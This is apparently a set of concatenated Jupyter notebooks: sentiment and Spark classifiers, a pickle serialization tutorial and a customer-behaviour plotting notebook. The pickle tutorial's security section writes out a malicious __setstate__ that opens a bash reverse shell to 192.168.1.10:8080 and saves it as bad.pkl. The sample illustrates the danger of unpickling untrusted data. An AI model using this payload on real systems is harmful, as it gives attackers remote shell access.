testing_set))*100) voted_classifier = VoteClassifier(#classifier, MultinomialNB_classifier, BernoulliNB_classifier, LogisticRegression_classifier, #SGDClassifier_classifier, LinearSVC_classifier, NuSVC_classifier) print("voted_classifier accuracy percent:", (nltk.classify.accuracy(voted_classifier, testing_set))*100) # print("Classification: ", voted_classifier.classify(testing_set[0][0]), # "Confidence %: ", voted_classifier.confidence(testing_set[0][0])*100) # print("Classification: ", voted_classifier.classify(testing_set[1][0]), # "Confidence %: ", voted_classifier.confidence(testing_set[1][0])*100) # print("Classification: ", voted_classifier.classify(testing_set[2][0]), # "Confidence %: ", voted_classifier.confidence(testing_set[2][0])*100) # print("Classification: ", voted_classifier.classify(testing_set[3][0]), # "Confidence %: ", voted_classifier.confidence(testing_set[3][0])*100) # print("Classification: ", voted_classifier.classify(testing_set[4][0]), # "Confidence %: ", voted_classifier.confidence(testing_set[4][0])*100) # print("Classification: ", voted_classifier.classify(testing_set[5][0]), # "Confidence %: ", voted_classifier.confidence(testing_set[5][0])*100) ###Output MNB_classifier accuracy percent: 81.47590361445783 
BernoulliNB_classifier accuracy percent: 80.87349397590361 LogisticRegression_classifier accuracy percent: 80.12048192771084
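###Markdown As a quick sanity check, we can also run the ensemble on a brand-new sentence. This cell is an added sketch, not part of the original tutorial: the example review text is invented, and the cell simply reuses `find_features()` and `voted_classifier` from above, mirroring the commented-out test-set calls. ###Code
# Added sketch: classify an unseen review and report the vote confidence.
example_review = "This movie was absolutely wonderful, with great acting and a clever plot."
feats = find_features(example_review)
print("Classification:", voted_classifier.classify(feats))
print("Confidence %:", voted_classifier.confidence(feats)*100)
###Output _____no_output_____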
docs/Seagate Project/Seagate_Project.ipynb
###Markdown K Means ###Code from pyspark.ml.clustering import KMeans from pyspark.ml.evaluation import ClusteringEvaluator silhouette_score2=[] evaluator = ClusteringEvaluator(predictionCol='prediction', featuresCol='features', metricName='silhouette', distanceMeasure='squaredEuclidean') for i in range(2,20): KMeans_algo=KMeans(featuresCol='features', k=i) KMeans_fit=KMeans_algo.fit(df_v) output=KMeans_fit.transform(df_v) score=evaluator.evaluate(output) silhouette_score2.append(score) print("Silhouette Score:",score) fig, ax = plt.subplots(1,1, figsize =(8,6)) ax.plot(range(2,20),silhouette_score2) ax.set_xlabel('k') ax.set_ylabel('cost') df_ss = df_ss.withColumn("idx", fn.monotonically_increasing_id()) from pyspark.ml.clustering import KMeans from pyspark.ml.evaluation import ClusteringEvaluator evaluator = ClusteringEvaluator(predictionCol='prediction', featuresCol='scaled_features', metricName='silhouette', distanceMeasure='squaredEuclidean') k = 2 kmeans = KMeans().setK(k).setSeed(1).setFeaturesCol("scaled_features") model = kmeans.fit(df_ss) centers = model.clusterCenters() print("Cluster Centers: ") for center in centers: print(center) predictions = model.transform(df_ss) silhouette = evaluator.evaluate(predictions) print("Silhouette with squared euclidean distance = " + str(silhouette)) print("Cluster Centers: ") ctr=[] centers = model.clusterCenters() for center in centers: ctr.append(center) ###Output Silhouette with squared euclidean distance = 0.17330592905654787 Cluster Centers: [-1.10568157e-02 1.34843725e-02 -1.04165171e-02 -1.07746528e-02 -1.82602199e-02 -5.35942898e-03 -1.59187558e-02 -1.92205419e-03 -3.21163442e-03 -1.70558380e-02 -8.81915530e-03 -6.46422412e-02 2.19091126e-02 -6.63283877e-02 3.55648284e-03 -1.23584312e-02 1.49290632e-03 -7.66098439e-03 6.68002717e-04 -1.11116874e-02 7.54137867e-04 1.98849887e-02 1.59907224e-02 -1.09136177e-02 -9.60715084e-03 -6.06493694e-02 -4.61885312e-02 -4.44842920e-02 -3.98679304e-03 -1.37413704e-02 9.15865457e-03 7.60859348e-03 -3.74162031e-02 -2.39044254e-02 8.40289097e-03 -4.16010105e-02 3.70695648e-02 1.10310233e-02 2.19313502e-02 1.77222300e-02 5.36477363e-02 -5.45637179e-02 7.87159762e-03 2.90631725e-04 -4.19009058e-01 -4.59656757e-03 4.19077903e-01 -7.54482487e-02 7.54482487e-02 2.40856690e-03 3.60244610e-03 -7.50485651e-02 7.48556008e-02 -1.17053363e-03 1.70113831e-02 1.33078735e-02 -7.71346423e-02 1.59010531e-01 -9.46546529e-02 -7.80095966e-02 8.50552162e-02 -8.50552162e-02 3.74939351e-02 2.50487766e-01 -3.36164382e-01 -1.31308431e-02 3.28869333e-03 1.05387308e-02 2.20105433e-03 1.11732540e-02 7.56609515e-03 -8.09948540e-04 -2.11786570e-03 -4.38592868e-02 2.78227936e-03 5.41773431e-03 3.27517648e-03 4.11810283e-03 -1.98147911e-03 2.83417694e-03 -5.16867116e-03 -1.14333043e-01 -5.69603035e-02 -6.87829857e-02 -6.17918061e-02 1.34407382e-01 -1.41018271e-01 3.70226779e-01 -2.44944142e-01 -2.15179912e-01 8.12204932e-03 6.97542646e-03 -2.79953174e-02 2.22467261e-02 2.48139751e-02 3.29965674e-02 -1.33523132e-01 9.20129789e-02 -6.66564860e-03 -5.24975561e-03 -1.60558163e-02 1.52833106e-01 -7.30094880e-02 -6.69709784e-03 -1.31171924e-01 3.06982277e-03 8.46501453e-03 1.65428156e-01 -5.32459648e-02 -6.64559195e-03 -1.69188955e-01 -8.65720313e-02 -2.08733285e-02 8.62520213e-02 -3.52431367e-05 8.95333791e-02 -2.12298653e-02 -8.00797023e-02 -8.10280748e-03 -3.25379090e-04 -2.58043674e-02 -5.92491508e-01 -6.10100977e-03 5.92554985e-01] [ 3.04314511e-02 -3.71127668e-02 2.86691700e-02 2.96548598e-02 5.02572353e-02 1.47506484e-02 
4.38128707e-02 5.29003102e-03 8.83931670e-03 4.69424392e-02 2.42727834e-02 1.77913538e-01 -6.03000091e-02 1.82554285e-01 -9.78843606e-03 3.40138612e-02 -4.10889597e-03 2.10851730e-02 -1.83853042e-03 3.05824734e-02 -2.07559845e-03 -5.47290537e-02 -4.40109431e-02 3.00373301e-02 2.64415676e-02 1.66924037e-01 1.27123764e-01 1.22433220e-01 1.09727701e-02 3.78200967e-02 -2.52071804e-02 -2.09409785e-02 1.02979862e-01 6.57916683e-02 -2.31271075e-02 1.14497623e-01 -1.02025816e-01 -3.03604630e-02 -6.03612131e-02 -4.87765364e-02 -1.47653584e-01 1.50174621e-01 -2.16648395e-02 -7.99899840e-04 1.15323019e+00 1.26510403e-02 -1.15341967e+00 2.07654694e-01 -2.07654694e-01 -6.62905013e-03 -9.91493980e-03 2.06554653e-01 -2.06023562e-01 3.22163613e-03 -4.68200870e-02 -3.66269920e-02 2.12296122e-01 -4.37641479e-01 2.60516094e-01 2.14704241e-01 -2.34095757e-01 2.34095757e-01 -1.03193802e-01 -6.89412431e-01 9.25218454e-01 3.61397547e-02 -9.05140436e-03 -2.90055364e-02 -6.05791748e-03 -3.07519219e-02 -2.08240112e-02 2.22920504e-03 5.82895908e-03 1.20713031e-01 -7.65761141e-03 -1.49111210e-02 -9.01420222e-03 -1.13341714e-02 5.45358504e-03 -7.80044807e-03 1.42256295e-02 3.14676529e-01 1.56770695e-01 1.89310025e-01 1.70068343e-01 -3.69926729e-01 3.88121745e-01 -1.01896770e+00 6.74154825e-01 5.92235335e-01 -2.23541527e-02 -1.91983257e-02 7.70509479e-02 -6.12292159e-02 -6.82950035e-02 -9.08157874e-02 3.67493025e-01 -2.53245467e-01 1.83457303e-02 1.44487966e-02 4.41900997e-02 -4.20639478e-01 2.00942542e-01 1.84322874e-02 3.61021843e-01 -8.44901134e-03 -2.32980889e-02 -4.55304579e-01 1.46547796e-01 1.82905288e-02 4.65655350e-01 2.38270457e-01 5.74492413e-02 -2.37389700e-01 9.69989748e-05 -2.46420915e-01 5.84305304e-02 2.20401751e-01 2.23011937e-02 8.95534312e-04 7.10208402e-02 1.63070244e+00 1.67916862e-02 -1.63087714e+00] ###Markdown Logistic ###Code trainv, testv = df_v.randomSplit([0.7, 0.3], seed = 1) trains, tests = df_ss.randomSplit([0.7, 0.3], seed = 1) logistic = cl.LogisticRegression(maxIter=10,featuresCol = 'features',labelCol='TARGET') modelv = logistic.fit(trainv) test_modelv = modelv.transform(testv) trainingSummaryv = modelv.summary roc = trainingSummaryv.roc.toPandas() plt.plot(roc['FPR'],roc['TPR']) plt.ylabel('False Positive Rate') plt.xlabel('True Positive Rate') plt.title('ROC Curve') plt.show() print('Training set areaUnderROC: ' + str(trainingSummaryv.areaUnderROC)) import pyspark.ml.evaluation as ev evaluatorv = ev.BinaryClassificationEvaluator(rawPredictionCol='probability', labelCol='TARGET') print(evaluatorv.evaluate(test_modelv, {evaluatorv.metricName: 'areaUnderROC'})) logistic = cl.LogisticRegression(maxIter=10,featuresCol = 'scaled_features',labelCol='TARGET') models = logistic.fit(trains) test_models = models.transform(tests) trainingSummarys = models.summary roc = trainingSummarys.roc.toPandas() plt.plot(roc['FPR'],roc['TPR']) plt.ylabel('False Positive Rate') plt.xlabel('True Positive Rate') plt.title('ROC Curve') plt.show() print('Training set areaUnderROC: ' + str(trainingSummarys.areaUnderROC)) evaluators = ev.BinaryClassificationEvaluator(rawPredictionCol='probability', labelCol='TARGET') print(evaluators.evaluate(test_models, {evaluators.metricName: 'areaUnderROC'})) from pyspark.mllib.evaluation import MulticlassMetrics preds_and_labels = test_models.select(['prediction','TARGET']).withColumn('label', fn.col('TARGET').cast(types.FloatType())).orderBy('prediction') preds_and_labels = preds_and_labels.select(['prediction','label']) metrics = 
MulticlassMetrics(preds_and_labels.rdd.map(tuple)) print(metrics.confusionMatrix().toArray()) ###Output [[8.6422e+04 2.0000e+00] [2.3280e+03 0.0000e+00]] ###Markdown Random Forest ###Code df_v = df_v.withColumn('TARGET', fn.col('TARGET').cast(types.DoubleType())) df_ss = df_ss.withColumn('TARGET', fn.col('TARGET').cast(types.DoubleType())) trainv, testv = df_v.randomSplit([0.7, 0.3], seed = 1) trains, tests = df_ss.randomSplit([0.7, 0.3], seed = 1) classifier = cl.RandomForestClassifier(numTrees=5, maxDepth=5, featuresCol = 'features', labelCol='TARGET') modelv = classifier.fit(trainv) testv = modelv.transform(testv) print(evaluatorv.evaluate(testv, {evaluatorv.metricName: "areaUnderROC"})) classifier = cl.RandomForestClassifier(numTrees=5, maxDepth=5, featuresCol = 'scaled_features', labelCol='TARGET') models = classifier.fit(trains) tests = models.transform(tests) print(evaluators.evaluate(tests, {evaluators.metricName: "areaUnderROC"})) from pyspark.mllib.evaluation import MulticlassMetrics preds_and_labels = tests.select(['prediction','TARGET']).withColumn('label', fn.col('TARGET').cast(types.FloatType())).orderBy('prediction') preds_and_labels = preds_and_labels.select(['prediction','label']) metrics = MulticlassMetrics(preds_and_labels.rdd.map(tuple)) print(metrics.confusionMatrix().toArray()) ###Output [[86424. 0.] [ 2328. 0.]] ###Markdown GBT ###Code trainv, testv = df_v.randomSplit([0.7, 0.3], seed = 1) trains, tests = df_ss.randomSplit([0.7, 0.3], seed = 1) gbtv = cl.GBTClassifier(maxIter=10, labelCol='TARGET',featuresCol = 'features') gbtModelv = gbtv.fit(trainv) predictionsv = gbtModelv.transform(testv) import pyspark.ml.evaluation as ev evaluatorv = ev.BinaryClassificationEvaluator(rawPredictionCol='probability', labelCol='TARGET') evaluators = ev.BinaryClassificationEvaluator(rawPredictionCol='probability', labelCol='TARGET') print(evaluatorv.evaluate(predictionsv, {evaluatorv.metricName: "areaUnderROC"})) from pyspark.ml.tuning import ParamGridBuilder, CrossValidator paramGridv = (ParamGridBuilder() .addGrid(gbtv.maxDepth, [2, 4, 6]) .addGrid(gbtv.maxBins, [20, 60]) .addGrid(gbtv.maxIter, [10, 20]) .build()) cvv = CrossValidator(estimator=gbtv, estimatorParamMaps=paramGridv, evaluator=evaluatorv, numFolds=5) # Run cross validations. This can take about 6 minutes since it is training over 20 trees! cvModelv = cvv.fit(trainv) predictionsv = cvModelv.transform(testv) evaluatorv.evaluate(predictionsv) gbts = cl.GBTClassifier(maxIter=10, labelCol='TARGET',featuresCol = 'scaled_features') gbtModels = gbts.fit(trains) predictionss = gbtModels.transform(tests) print(evaluators.evaluate(predictionss, {evaluators.metricName: "areaUnderROC"})) from pyspark.ml.tuning import ParamGridBuilder, CrossValidator paramGrids = (ParamGridBuilder() .addGrid(gbts.maxDepth, [2, 4, 6]) .addGrid(gbts.maxBins, [20, 60]) .addGrid(gbts.maxIter, [10, 20]) .build()) cvs = CrossValidator(estimator=gbts, estimatorParamMaps=paramGrids, evaluator=evaluators, numFolds=5) # Run cross validations. This can take about 6 minutes since it is training over 20 trees! 
cvModels = cvs.fit(trains) predictionss = cvModels.transform(tests) evaluators.evaluate(predictionss) from pyspark.mllib.evaluation import MulticlassMetrics preds_and_labels = predictionss.select(['prediction','TARGET']).withColumn('label', fn.col('TARGET').cast(types.FloatType())).orderBy('prediction') preds_and_labels = preds_and_labels.select(['prediction','label']) metrics = MulticlassMetrics(preds_and_labels.rdd.map(tuple)) print(metrics.confusionMatrix().toArray()) print(metrics.confusionMatrix()) print(metrics.precision(0.0)) print(metrics.recall(0.0)) ###Output DenseMatrix([[8.6404e+04, 2.0000e+01], [2.3240e+03, 4.0000e+00]]) 0.9738075917410512 0.9997685828010737
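###Markdown Added note (not part of the original notebook): after cross-validation it can be useful to inspect which hyperparameter combination won. The sketch below only uses the fitted `cvModels` object from above together with standard `pyspark.ml.tuning` attributes (`avgMetrics`, `bestModel`). ###Code
# Added sketch: average AUC for each parameter combination tried by the grid,
# and the parameter map of the best GBT model found.
avg_metrics = cvModels.avgMetrics
best_params = cvModels.bestModel.extractParamMap()
###Output _____no_output_____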
Python/05. Modules/01.2 pickle.ipynb
###Markdown Persist Objects in Python Table of Contents * [Serialization in Python](serialization_in_python)* [Inside the Python pickle Module](inside_the_python_pickle_module)* [Protocol Formats of the Python pickle Module](protocol_formats_of_the_python_pickle_module)* [Picklable and Unpicklable Types](picklable_and_unpicklable_types)* [Compression of Pickled Objects](compression_of_pickled_objects)* [Security Concerns With the Python pickle Module](security_concerns_with_the_python_pickle_module)* [ Conclusion](_conclusion)--- As a developer, you may sometimes need to send complex object hierarchies over a network or save the internal state of your objects to a disk or database for later use. To accomplish this, you can use a process called serialization, which is fully supported by the standard library thanks to the Python `pickle` module. In this section, you’ll learn:- What it means to **serialize** and **deserialize** an object- Which **modules** you can use to serialize objects in Python- Which kinds of objects can be serialized with the Python `pickle` module- How to use the Python pickle module to serialize **object hierarchies**- What the **risks** are when deserializing an object from an untrusted sourceLet’s get pickling! Serialization in Python The **serialization** process is a way to convert a data structure into a linear form that can be stored or transmitted over a network. In Python, serialization allows you to take a complex object structure and transform it into a stream of bytes that can be saved to a disk or sent over a network. You may also see this process referred to as **marshalling**. The reverse process, which takes a stream of bytes and converts it back into a data structure, is called **deserialization** or **unmarshalling**. Serialization can be used in a lot of different situations. One of the most common uses is saving the state of a neural network after the training phase so that you can use it later without having to redo the training. Python offers three different modules in the standard library that allow you to serialize and deserialize objects:1. The [`marshal`](https://docs.python.org/3/library/marshal.html) module2. The [`json`](https://docs.python.org/3/library/json.html) module3. The [`pickle`](https://docs.python.org/3/library/pickle.html) module In addition, Python supports [`XML`](https://www.xml.com/axml/axml.html), which you can also use to serialize objects. The `marshal` module is the oldest of the three listed above. It exists mainly to read and write the compiled bytecode of Python modules, or the `.pyc` files you get when the interpreter imports a Python module. So, even though you can use `marshal` to serialize some of your objects, it’s not recommended. The `json` module is the newest of the three. It allows you to work with standard JSON files. JSON is a very convenient and widely used format for data exchange. There are several reasons to choose the JSON format: It’s human readable and language independent, and it’s lighter than XML. With the `json` module, you can serialize and deserialize several standard Python types:- `bool`- `dict`- `int`- `float`- `list`- `string`- `tuple`- `None` The Python `pickle` module is another way to serialize and deserialize objects in Python. It differs from the `json` module in that it serializes objects in a binary format, which means the result is not human readable. However, it’s also faster and it works with many more Python types right out of the box, including your custom-defined objects. 
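###Markdown As a quick illustration of that difference (this cell is an addition, not part of the original text): both modules can serialize a plain dictionary, but `json` produces readable text while `pickle` produces opaque bytes. ###Code
# Added sketch: the same dict serialized with json (text) and with pickle (binary).
import json
import pickle

payload = {"first": "a", "second": 2}
print(json.dumps(payload))    # human-readable text
print(pickle.dumps(payload))  # binary format, not human readable
###Output _____no_output_____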
**Note:** From now on, you’ll see the terms **pickling** and **unpickling** used to refer to serializing and deserializing with the Python `pickle` module. So, you have several different ways to serialize and deserialize objects in Python. But which one should you use? The short answer is that there’s no one-size-fits-all solution. It all depends on your use case. Here are three general guidelines for deciding which approach to use:1. Don’t use the `marshal` module. It’s used mainly by the interpreter, and the official documentation warns that the Python maintainers may modify the format in backward-incompatible ways.2. The `json` module and XML are good choices if you need interoperability with different languages or a human-readable format.3. The Python `pickle` module is a better choice for all the remaining use cases. If you don’t need a human-readable format or a standard interoperable format, or if you need to serialize custom objects, then go with `pickle`. Inside the Python pickle Module The Python pickle module basically consists of four methods:```pythonpickle.dump(obj, file, protocol=None, *, fix_imports=True, buffer_callback=None)pickle.dumps(obj, protocol=None, *, fix_imports=True, buffer_callback=None)pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)``` The first two methods are used during the pickling process, and the other two are used during unpickling. The only difference between `dump()` and `dumps()` is that the first creates a file containing the serialization result, whereas the second returns a string. To differentiate `dumps()` from `dump()`, it’s helpful to remember that **the `s` at the end of the function name stands for `string`**. The same concept also applies to `load()` and `loads()`: The first one reads a file to start the unpickling process, and the second one operates on a string. Consider the following example. Say you have a custom-defined class named `example_class` with several different attributes, each of a different type:- `a_number`- `a_string`- `a_dictionary`- `a_list`- `a_tuple` The example below shows how you can instantiate the class and pickle the instance to get a plain string. After pickling the class, you can change the value of its attributes without affecting the pickled string. You can then unpickle the pickled string in another variable, restoring an exact copy of the previously pickled class: ###Code # pickling.py import pickle class example_class: a_number = 35 a_string = "hey" a_list = [1, 2, 3] a_dict = {"first": "a", "second": 2, "third": [1, 2, 3]} a_tuple = (22, 23) my_object = example_class() my_pickled_object = pickle.dumps(my_object) # Pickling the object print(f"This is my pickled object:\n{my_pickled_object}\n") my_object.a_dict = None my_unpickled_object = pickle.loads(my_pickled_object) # Unpickling the object print(f"This is a_dict of the unpickled object:\n{my_unpickled_object.a_dict}\n") ###Output This is my pickled object: b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.' This is a_dict of the unpickled object: {'first': 'a', 'second': 2, 'third': [1, 2, 3]} ###Markdown In the example above, you create several different objects and serialize them with `pickle`. This produces a single string with the serialized result. The pickling process ends correctly, storing your entire instance in this string: `b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'`. 
After the pickling process ends, you modify your original object by setting the attribute `a_dict` to `None`. Finally, you unpickle the string to a completely new instance. What you get is a deep copy of your original object structure from the time that the pickling process began. Protocol Formats of the Python pickle Module As mentioned above, the `pickle` module is Python-specific, and the result of a pickling process can be read only by another Python program. But even if you're working with Python, it's important to know that the `pickle` module has evolved over time. This means that if you've pickled an object with a specific version of Python, then you may not be able to unpickle it with an older version. The compatibility depends on the protocol version that you used for the pickling process. There are currently six different protocols that the Python pickle module can use. The higher the protocol version, the more recent the Python interpreter needs to be for unpickling.
- **Protocol version 0** was the first version. Unlike later protocols, it's human readable.
- **Protocol version 1** was the first binary format.
- **Protocol version 2** was introduced in Python 2.3.
- **Protocol version 3** was added in Python 3.0. It can't be unpickled by Python 2.x.
- **Protocol version 4** was added in Python 3.4. It features support for a wider range of object sizes and types and is the default protocol starting with Python 3.8.
- **Protocol version 5** was added in Python 3.8. It features support for out-of-band data and improved speeds for in-band data.
Note: Newer versions of the protocol offer more features and improvements but are limited to higher versions of the interpreter. Be sure to consider this when choosing which protocol to use.
To identify the highest protocol that your interpreter supports, you can check the value of the `pickle.HIGHEST_PROTOCOL` attribute. ###Code
pickle.HIGHEST_PROTOCOL
###Output _____no_output_____
###Markdown To choose a specific protocol, you need to specify the protocol version when you invoke `load()`, `loads()`, `dump()` or `dumps()`. If you don't specify a protocol, then your interpreter will use the default version specified in the `pickle.DEFAULT_PROTOCOL` attribute. ###Markdown Picklable and Unpicklable Types You've already learned that the Python `pickle` module can serialize many more types than the json module. However, not everything is picklable. The list of unpicklable objects includes database connections, opened network sockets, running threads, and others. If you find yourself faced with an unpicklable object, then there are a couple of things that you can do. The first option is to use a third-party library such as `dill`. The `dill` module extends the capabilities of `pickle`. According to the official documentation, it lets you serialize less common types like functions with yields, nested functions, lambdas, and many others.
To test this module, you can try to pickle a `lambda` function. If you try to run this program, then you will get an exception, because the Python `pickle` module can't serialize a `lambda` function: ###Code
# pickling_error.py
import pickle

square = lambda x : x * x
my_pickle = pickle.dumps(square)
###Output _____no_output_____
###Markdown Now try replacing the Python `pickle` module with `dill` to see if there's any difference. If you run this code, then you'll see that the `dill` module serializes the `lambda` without returning an error: ###Code
# pickling_dill.py
import dill

square = lambda x: x * x
my_pickle = dill.dumps(square)
print(my_pickle)
###Output b'\x80\x03cdill._dill\n_create_function\nq\x00(cdill._dill\n_create_code\nq\x01(K\x01K\x00K\x01K\x02KCC\x08|\x00|\x00\x14\x00S\x00q\x02N\x85q\x03)X\x01\x00\x00\x00xq\x04\x85q\x05X\x1f\x00\x00\x00<ipython-input-17-fd95d6aa4b4e>q\x06X\x08\x00\x00\x00<lambda>q\x07K\x04C\x00q\x08))tq\tRq\nc__builtin__\n__main__\nh\x07NN}q\x0bNtq\x0cRq\r.'
###Markdown **Note:** Before you use `dill` instead of `pickle`, keep in mind that `dill` is not included in the standard library of the Python interpreter and is typically slower than `pickle`. Another interesting feature of `dill` is that it can even serialize an entire interpreter session. Here's an example: ###Code
>>> square = lambda x : x * x
>>> a = square(35)
>>> import math
>>> b = math.sqrt(484)
>>> import dill
>>> dill.dump_session('test.pkl')
###Output _____no_output_____
###Markdown In this example, you start the interpreter, import a module, and define a `lambda` function along with a couple of other variables. You then import the `dill` module and invoke `dump_session()` to serialize the entire session. If everything goes okay, then you should get a `test.pkl` file in your current directory. Now you can start a new instance of the interpreter and load the `test.pkl` file to restore your last session: ###Code
>>> globals().items()
>>> import dill
>>> dill.load_session('test.pkl')
>>> globals().items()
>>> a
>>> b
>>> square
###Output _____no_output_____
###Markdown The first `globals().items()` statement demonstrates that the interpreter is in the initial state. This means that you need to import the `dill` module and call `load_session()` to restore your serialized interpreter session. Even though `dill` lets you serialize a wider range of objects than `pickle`, it can't solve every serialization problem that you may have. If you need to serialize an object that contains a database connection, for example, then you're in for a tough time because it's an unserializable object even for `dill`. So, how can you solve this problem? The solution in this case is to exclude the object from the serialization process and to **reinitialize** the connection after the object is deserialized.
In the following example, you'll see how you can define a class with several attributes and exclude one attribute from serialization with `__getstate__()`: ###Code
# custom_pickling.py
import pickle

class foobar:
    def __init__(self):
        self.a = 35
        self.b = "test"
        self.c = lambda x: x * x

    def __getstate__(self):
        attributes = self.__dict__.copy()
        del attributes['c']
        return attributes

my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)
print(my_new_instance.__dict__)
###Output {'a': 35, 'b': 'test'}
###Markdown In this example, you create an object with three attributes. Since one attribute is a `lambda`, the object is unpicklable with the standard `pickle` module. To address this issue, you specify what to pickle with `__getstate__()`. You first clone the entire `__dict__` of the instance to have all the attributes defined in the class, and then you manually remove the unpicklable `c` attribute. If you run this example and then deserialize the object, then you'll see that the new instance doesn't contain the `c` attribute. But what if you wanted to do some additional initializations while unpickling, say by adding the excluded `c` object back to the deserialized instance? You can accomplish this with `__setstate__()`. ###Code
# custom_unpickling.py
import pickle

class foobar:
    def __init__(self):
        self.a = 35
        self.b = "test"
        self.c = lambda x: x * x

    def __getstate__(self):
        attributes = self.__dict__.copy()
        del attributes['c']
        return attributes

    def __setstate__(self, state):
        self.__dict__ = state
        self.c = lambda x: x * x

my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)
print(my_new_instance.__dict__)
###Output {'a': 35, 'b': 'test', 'c': <function foobar.__setstate__.<locals>.<lambda> at 0x7f2704f81a70>}
###Markdown By passing the excluded `c` object to `__setstate__()`, you ensure that it appears in the `__dict__` of the unpickled string. Compression of Pickled Objects Although the `pickle` data format is a compact binary representation of an object structure, you can still optimize your pickled string by compressing it with `bzip2` or `gzip`. To compress a pickled string with `bzip2`, you can use the `bz2` module provided in the standard library. In the following example, you'll take a string, pickle it, and then compress it using the `bz2` library: ###Code
>>> import pickle
>>> import bz2
>>> my_string = """Per me si va ne la città dolente,
... per me si va ne l'etterno dolore,
... per me si va tra la perduta gente.
... Giustizia mosse il mio alto fattore:
... fecemi la divina podestate,
... la somma sapienza e 'l primo amore;
... dinanzi a me non fuor cose create
... se non etterne, e io etterno duro.
... Lasciate ogne speranza, voi ch'intrate."""
>>> pickled = pickle.dumps(my_string)
>>> compressed = bz2.compress(pickled)
>>> len(my_string)
315
>>> len(compressed)
259
###Output _____no_output_____
###Markdown When using compression, bear in mind that smaller files come at the cost of a slower process. Security Concerns With the Python pickle Module You now know how to use the `pickle` module to serialize and deserialize objects in Python. The serialization process is very convenient when you need to save your object's state to disk or to transmit it over a network.
However, there's one more thing you need to know about the Python `pickle` module: It's not secure. Do you remember the discussion of `__setstate__()`? Well, that method is great for doing more initialization while unpickling, but it can also be used to execute arbitrary code during the unpickling process! So, what can you do to reduce this risk? Sadly, not much. The rule of thumb is to **never unpickle data that comes from an untrusted source or is transmitted over an insecure network**. In order to prevent man-in-the-middle attacks, it's a good idea to use libraries such as `hmac` to sign the data and ensure it hasn't been tampered with. The following example illustrates how unpickling a tampered pickle could expose your system to attackers, even giving them a working remote shell: ###Code
# remote.py
import pickle
import os

class foobar:
    def __init__(self):
        pass

    def __getstate__(self):
        return self.__dict__

    def __setstate__(self, state):
        # The attack is from 192.168.1.10
        # The attacker is listening on port 8080
        os.system('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.1.10/8080 0>&1"')

pickle.dump(foobar(), open("./bad.pkl", 'wb'))

my_foobar = foobar()
my_pickle = pickle.dumps(my_foobar)
my_unpickle = pickle.loads(my_pickle)
###Output _____no_output_____
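###Markdown The `hmac` idea mentioned above can be sketched in a few lines. This cell is an addition to the text, not part of the original tutorial: the secret key is a placeholder, and sign-then-verify with a shared key is one minimal way to detect tampering, not a complete security solution. ###Code
# Added sketch: sign pickled bytes with HMAC-SHA256 and verify before unpickling.
import hashlib
import hmac
import pickle

SECRET_KEY = b'replace-with-a-real-secret'  # placeholder key shared by both sides

data = {"a": 35, "b": "test"}
pickled = pickle.dumps(data)
signature = hmac.new(SECRET_KEY, pickled, hashlib.sha256).hexdigest()

# On the receiving side, recompute the signature and compare in constant time.
expected = hmac.new(SECRET_KEY, pickled, hashlib.sha256).hexdigest()
if hmac.compare_digest(signature, expected):
    restored = pickle.loads(pickled)  # only unpickle after the signature checks out
else:
    raise ValueError("Pickle signature mismatch -- refusing to unpickle")
###Output _____no_output_____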
tutorials/Visualize_Customer_Behavior.ipynb
###Markdown ContextIn this tutorial, we are using sample data from Unbounce. Unbounce is a subscription-based tool that helps marketers to publish and optimize landing pages for a high conversion rate. For this tutorial, the data includes events and subscription information for 4 accounts. No personal information is included, and account unique identifications have been changed to ensure security. Load DataCustomer behavior data usually includes date and time events, the moments when customers do a particular action. In this tutorial, we will look into events for account republish (`republished_df`) and login (`login_df`). We also have subscription information for each customer (`subscription_info_df`). A customer can have multiple subscriptions, but each subscription is mutually exclusive. A new subscription for a customer only starts when he/she churns (meaning stop paying) then re-subscribe. We call this person a flapper. ###Code republished_df = pd.read_csv("../data/visualize-customer-behavior/republished_sample.csv") login_df = pd.read_csv("../data/visualize-customer-behavior/login_sample.csv") subscription_info_df = pd.read_csv("../data/visualize-customer-behavior/subscription_info.csv") republished_df.head() login_df.head() subscription_info_df.head() ###Output _____no_output_____ ###Markdown Transform DataBefore going into the visualization, we need to transform date columns to date-time format. Right now, Python thinks that they are a bunch of strings. Hence, the dates will not be arranged in a timely order. ###Code republished_df['action_date'] = pd.to_datetime(republished_df['action_date']) login_df['action_date'] = pd.to_datetime(login_df['action_date']) subscription_info_df['subscription_starts_at'] = pd.to_datetime(subscription_info_df['subscription_starts_at']) subscription_info_df['subscription_ends_at'] = pd.to_datetime(subscription_info_df['subscription_ends_at']) sample_subscription = subscription_info_df[subscription_info_df['AccountCode'] == 'a'] sample_republished = republished_df[republished_df['AccountCode'] == 'a'] sample_login = login_df[login_df['AccountCode'] == 'a'] # this is a constant for visualization purpose sample_subscription['vizline'] = 0.5 sample_republished['vizline'] = 0.5 sample_login['vizline'] = 0.5 ###Output _____no_output_____ ###Markdown Visualize **TIP 1: Is this account a same-day flapper? Let's mix some colors!** **This tip is handy when we need to visualize different events that only happen once, but they may happen on the same day**.Like any subscription-based company, Unbounce expects flappers -- subscribers who subscribe, churn, then come back at some point in time. There are cases when churn and re-subscription happen on the **same** date. To distinguish same-day flappers, we can use this color mixing trick. *Note: we assume here that each subscription is mutually exclusive to another.*If we visualize `subscription start date` with a different color than `subscription end date` and use some opacity level, we will have a different color for same-day flappers.For example, here I choose **blue** for `subscription start date` and **red** for `subscription end date`, and change opacity level through `alpha = 0.5` (`alpha` ranges from 0 to 1). 
This results in **magenta** for same-day flappers. You can learn more about the basics of color mixing through this article: https://mymodernmet.com/color-mixing-chart/. Here is a list of color codes in Matplotlib: https://matplotlib.org/examples/color/named_colors.html ###Code
fig, ax = plt.subplots(figsize=(20, 5))

ax.plot(sample_subscription['subscription_starts_at'],
        sample_subscription['vizline'],
        marker='|', linewidth = 0.1,
        markersize=50, mew=2, alpha=0.5,
        color='royalblue', label='Subscription Starts')

no_expire_mask = ~sample_subscription['subscription_ends_at'].isnull()
ax.plot(sample_subscription[no_expire_mask]['subscription_ends_at'],
        sample_subscription[no_expire_mask]['vizline'],
